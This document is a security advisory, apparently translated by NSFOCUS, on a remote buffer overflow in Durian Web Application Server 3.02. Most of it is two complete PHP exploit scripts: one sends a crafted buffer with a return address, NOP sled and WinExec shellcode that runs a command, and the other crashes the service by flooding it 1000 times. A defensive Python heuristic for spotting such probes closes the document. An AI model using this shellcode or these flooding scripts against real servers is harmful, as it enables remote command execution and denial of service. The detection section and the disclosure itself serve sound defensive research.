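Durian Web Application Server Remote Overflow Vulnerability

Published: 2006-12-29
Updated: 2006-12-30

Affected systems:
Durian Web Application Server 3.02
Description:
BUGTRAQ  ID: 21808

Durian is a free web application server used to generate interactive, dynamic web content in the APS or DWS languages.

Durian contains a buffer overflow in its handling of malicious malformed requests. A remote attacker can exploit this vulnerability to cause a denial of service or execute arbitrary commands.

<*Source: rgod (rgod@autistici.org)
  *>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!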

<?php
/*
Durian Web Application Server 3.02 freeware for Win32 buffer
overflow execute command exploit

by rgod
mail: retrog at alice dot it
site: http://retrogod.altervista.org

tested against xp sp2 ita

software site -> http://sourceforge.net/projects/durian/

*/

error_reporting(E_ALL);
$address = "192.168.1.3";
$service_port = "4002";

$shellcode =
"\xeb\x1b".
"\x5b".
"\x31\xc0".
"\x50".
"\x31\xc0".
"\x88\x43\x59".
"\x53".
"\xbb\x6d\x13\x86\x7c". //WinExec, 0x7c86136d
"\xff\xd3".
"\x31\xc0".
"\x50".
"\xbb\xda\xcd\x81\x7c". //ExitProcess, 0x7c81cdda
"\xff\xd3".
"\xe8\xe0\xff\xff\xff".
"\x63\x6d\x64".
"\x2e".
"\x65".
"\x78\x65".
"\x20\x2f".
"\x63\x20".
"cmd.exe /c start notepad & ";

//$eip="\x72\xe0\xf1\x00";//DEP disabled
$eip="\x72\xe0\xf2\x00";

$ch  =array("\xaa","\xa0","\x41");
$size=array(30,70,150,330,520,700,1400,2300);

    for ($j=0; $j<count($ch); $j++){
        for ($i=0; $i<count($size); $i++){
            $junk="";
            if (($j==2) and ($i==7)){
                $junk ="AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVXXXX";
                $junk.="YYYYZZZZaaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnnnooooppppqqqqrrrrssssttttuuuu";
        $junk.=$eip; //jmp shellcode
        for ($n=1; $n<=100; $n++){
            $junk.="\x90";
        }
        $junk.=$shellcode;
                for ($n=1; $n=(2300-strlen($junk)); $n++){
            $junk.="\x90";
        }
            }
            else {
        for ($k=1; $k<=$size[$i]; $k++){
                    $junk.=$ch[$j];
                }
        }
            $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
            if ($socket < 0) {
                die("socket_create() failed:\n reason: " . socket_strerror($socket) . "\n");
            }
            $result = socket_connect($socket, $address, $service_port);
            if ($result < 0) {
                die("socket_connect() failed:\n reason: ($result) " . socket_strerror($result) . "\n");
            }
            $in = $junk;
            socket_write($socket, $in, strlen ($in));
            socket_close($socket);
        }
   }
?>

==============================================================================================

<?php
//Durian Web Application Server 3.02 freeware for Win32 denial of service exploit
//this will merely show 1000 access violation boxes to screen
//software site -> http://sourceforge.net/projects/durian/

//by rgod mail: retrog at alice dot it site: http://retrogod.altervista.org

error_reporting(E_ALL);
$service_port = "4002";
$address = "192.168.1.3";

$ch  =array("\xaa","\xa0","\x41");
$size=array(30,70,150,330,520,700,1400,2300);
$c=1000;

for ($m=1; $m<=$c; $m++){
    for ($j=0; $j<3; $j++){
        for ($i=0; $i<8; $i++){
            $junk="";
            for ($k=1; $k<=$size[$i]; $k++){
                $junk.=$ch[$j];
            }
            echo "buf size:".$size[$i]."|char:".$ch[$j]."\n";
            $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
            if ($socket < 0) {
                die("socket_create() failed:\n reason: " . socket_strerror($socket) . "\n");
            }
            $result = socket_connect($socket, $address, $service_port);
            if ($result < 0) {
                die("socket_connect() failed:\n reason: ($result) " . socket_strerror($result) . "\n");
            }
            $in = $junk;
            socket_write($socket, $in, strlen ($in));
            socket_close($socket);
        }
   }
sleep(1);
}
?>

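Recommendation:
Vendor patch:

Durian
------
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version: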

http://sourceforge.net/projects/durian/
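
Until a fixed version exists, traffic to the Durian port can be screened for the request shapes the two scripts above send: raw buffers with no HTTP request line, made of a single repeated byte in sizes from 30 to 2300, or padded with 0x90 bytes. The following is an added example, not part of the original advisory or of rgod's code; the thresholds, function names and sample payloads are assumptions constructed for illustration.

```python
import re

DURIAN_PORT = 4002        # service port used by both scripts in this advisory
MAX_RUN = 24              # assumed threshold: longest run of one byte value tolerated
NOP_SLED = 16             # assumed threshold: consecutive 0x90 bytes treated as padding
MAX_REQUEST_LINE = 2048   # assumed upper bound for a legitimate request line

# A well-formed HTTP/1.x request line: METHOD SP target SP version
REQUEST_LINE = re.compile(rb"^[A-Z]{3,10} [\x21-\x7e]+ HTTP/1\.[01]\r?\n")

def longest_run(data: bytes) -> int:
    """Length of the longest run of one repeated byte value."""
    best = cur = 0
    prev = None
    for b in data:
        cur = cur + 1 if b == prev else 1
        prev = b
        best = max(best, cur)
    return best

def classify(payload: bytes, dst_port: int = DURIAN_PORT) -> list:
    """Return the reasons a payload sent to the Durian port looks like an overflow probe."""
    reasons = []
    if dst_port != DURIAN_PORT or not payload:
        return reasons
    if not REQUEST_LINE.match(payload):
        reasons.append("no-http-request-line")
    if longest_run(payload) >= MAX_RUN:
        reasons.append("long-single-byte-run")
    if b"\x90" * NOP_SLED in payload:
        reasons.append("nop-sled")
    if len(payload.split(b"\n", 1)[0]) > MAX_REQUEST_LINE:
        reasons.append("oversized-request-line")
    return reasons

# Constructed sample payloads (not captured traffic); the padded sample carries
# 0xcc filler where a real buffer would carry code.
SAMPLES = {
    "benign":  b"GET /index.dws HTTP/1.0\r\nHost: example.test\r\n\r\n",
    "probe":   b"\xaa" * 330,
    "largest": b"A" * 2300,
    "padded":  b"AAAABBBBCCCC" + b"\x90" * 100 + b"\xcc" * 32,
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(f"{name:8s} {len(data):5d} bytes -> {classify(data) or 'ok'}")
```

These are heuristics: a legitimate request can contain a long run of one character, so a hit is a reason to inspect the connection, not proof of an attack.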

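This security advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.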